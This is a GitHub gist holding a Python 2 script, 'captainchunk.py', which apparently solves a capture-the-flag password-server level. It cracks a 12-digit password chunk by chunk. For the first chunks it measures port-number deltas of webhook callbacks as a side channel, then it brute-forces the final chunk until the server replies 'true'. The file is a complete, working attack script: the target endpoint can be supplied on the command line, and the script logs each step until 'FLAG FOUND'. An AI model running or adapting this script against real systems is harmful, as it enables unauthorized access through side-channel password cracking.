Skip to content

Instantly share code, notes, and snippets.

@jermenkoo

jermenkoo/captainchunk.py

Created August 30, 2015 21:28
Show Gist options
  • Save jermenkoo/4e8f7f939bb396d3b4e0 to your computer and use it in GitHub Desktop.
Save jermenkoo/4e8f7f939bb396d3b4e0 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
captainchunk.py
import socket
import urllib2
import sys
import random
import logging
import operator
logging.basicConfig(filename='runs.log', level=logging.DEBUG)
PORT = random.randint(20000, 30000)
def out(text):
print text
logging.debug(text)
local = 1
if local == 0:
BASE = 0
ENDPOINT = "%s" % sys.argv[1]
HOOK = "0.0.0.0:%d" % PORT
else:
BASE = 1
ENDPOINT = "http://127.0.0.1:3000"
HOOK = "localhost:%d" % PORT
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', PORT))
s.listen(1)
s.settimeout(2)
lastport = -54321
chunk_candidates = ['a', range(0, 1000), range(0, 1000), range(0, 1000)]
GOOD_CHUNKS = ['a', 0, 0, 0, 0]
total_requests = 0
out(ENDPOINT)
out(HOOK)
if int(sys.argv[2]) == 0:
for CHUNK in range(1, 4):
out('Working on chunk %d' % CHUNK)
DELTA = 2 + CHUNK + BASE
#dict candidate:score
good_candidate = {-1: -1}
while len(chunk_candidates[CHUNK]) > 1:
twos = 0
tested = 0
MINIMUM_SCORE = 3
#on pourrait ponderer ca avec le nombre d'elements, puisque ca determine environ le nombre de re-bouclage sur chunk-candidates
for n in chunk_candidates[CHUNK]:
if len(chunk_candidates[CHUNK]) == 1:
break
GOOD_CHUNKS[CHUNK] = n
password = '%03d%03d%03d%03d' % (GOOD_CHUNKS[1], GOOD_CHUNKS[2], GOOD_CHUNKS[3], GOOD_CHUNKS[4])
data = '{"password": "' + password + '", "webhooks": ["' + HOOK + '"]}'
if tested > 200:
adjust = float(twos) / float(tested)
if adjust >= 0.7 and MINIMUM_SCORE != 2:
MINIMUM_SCORE = 2
out("MIN SCORE %d" % MINIMUM_SCORE)
if adjust <= 0.25 and MINIMUM_SCORE != 4:
MINIMUM_SCORE = 4
out("MIN SCORE %d" % MINIMUM_SCORE)
trythis = True
tries = 0
while(trythis):
try:
urllib2.urlopen(ENDPOINT, data)
s2, (host, port) = s.accept()
portdelta = port - lastport
lastport = port
s2.close()
except socket.timeout:
pass
total_requests += 1
tested += 1
tries += 1
if total_requests % 250 == 0:
lala = float(twos) / float(tested)
#out("%d/%d %3f" % (twos, tested, lala))
out("Requests so far : %d, remaining elt : %d" % (total_requests, len(chunk_candidates[CHUNK])))
#logging.warning('%d : delta: %d' % (n, portdelta))
if portdelta == DELTA:
#add candidate or increment its score
good_candidate[n] = good_candidate.get(n, 0) + 1
#if we have a good candidate, stop here
best_n = max(good_candidate.iteritems(), key=operator.itemgetter(1))[0] # get candidate with higher score
if good_candidate[best_n] >= MINIMUM_SCORE:
chunk_candidates[CHUNK] = [best_n]
break
break
else:
#if portdelta == DELTA -1 :
if portdelta <= DELTA - 1:
twos += 1
trythis = False
if n in chunk_candidates[CHUNK]:
chunk_candidates[CHUNK].remove(n)
break
if tries >= 3:
break
GOOD_CHUNKS[CHUNK] = chunk_candidates[CHUNK][0]
out("So far, we have %03d%03d%03d%03d (%d)" % (GOOD_CHUNKS[1], GOOD_CHUNKS[2], GOOD_CHUNKS[3], GOOD_CHUNKS[4], total_requests))
out('Working on chunk 4')
#BRUTEFORCING THE FINISH
if int(sys.argv[2]) == 0:
p1 = password = '%03d%03d%03d' % (GOOD_CHUNKS[1], GOOD_CHUNKS[2], GOOD_CHUNKS[3])
else:
p1 = password = '%09d' % int(sys.argv[2])
for n in xrange(0, 1000):
password = '%s%03d' % (p1, n)
data = '{"password": "' + password + '", "webhooks": ["' + HOOK + '"]}'
try:
f = urllib2.urlopen(ENDPOINT, data)
total_requests += 1
x = f.read()
except socket.timeout:
out("%d : timeout")
pass
out("%d : %s" % (n, x))
if "true" in x:
out("FLAG FOUND : %03d%03d%03d%03d" % (GOOD_CHUNKS[1], GOOD_CHUNKS[2], GOOD_CHUNKS[3], n))
break
f.close()
out("Total requests: %d" % total_requests)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment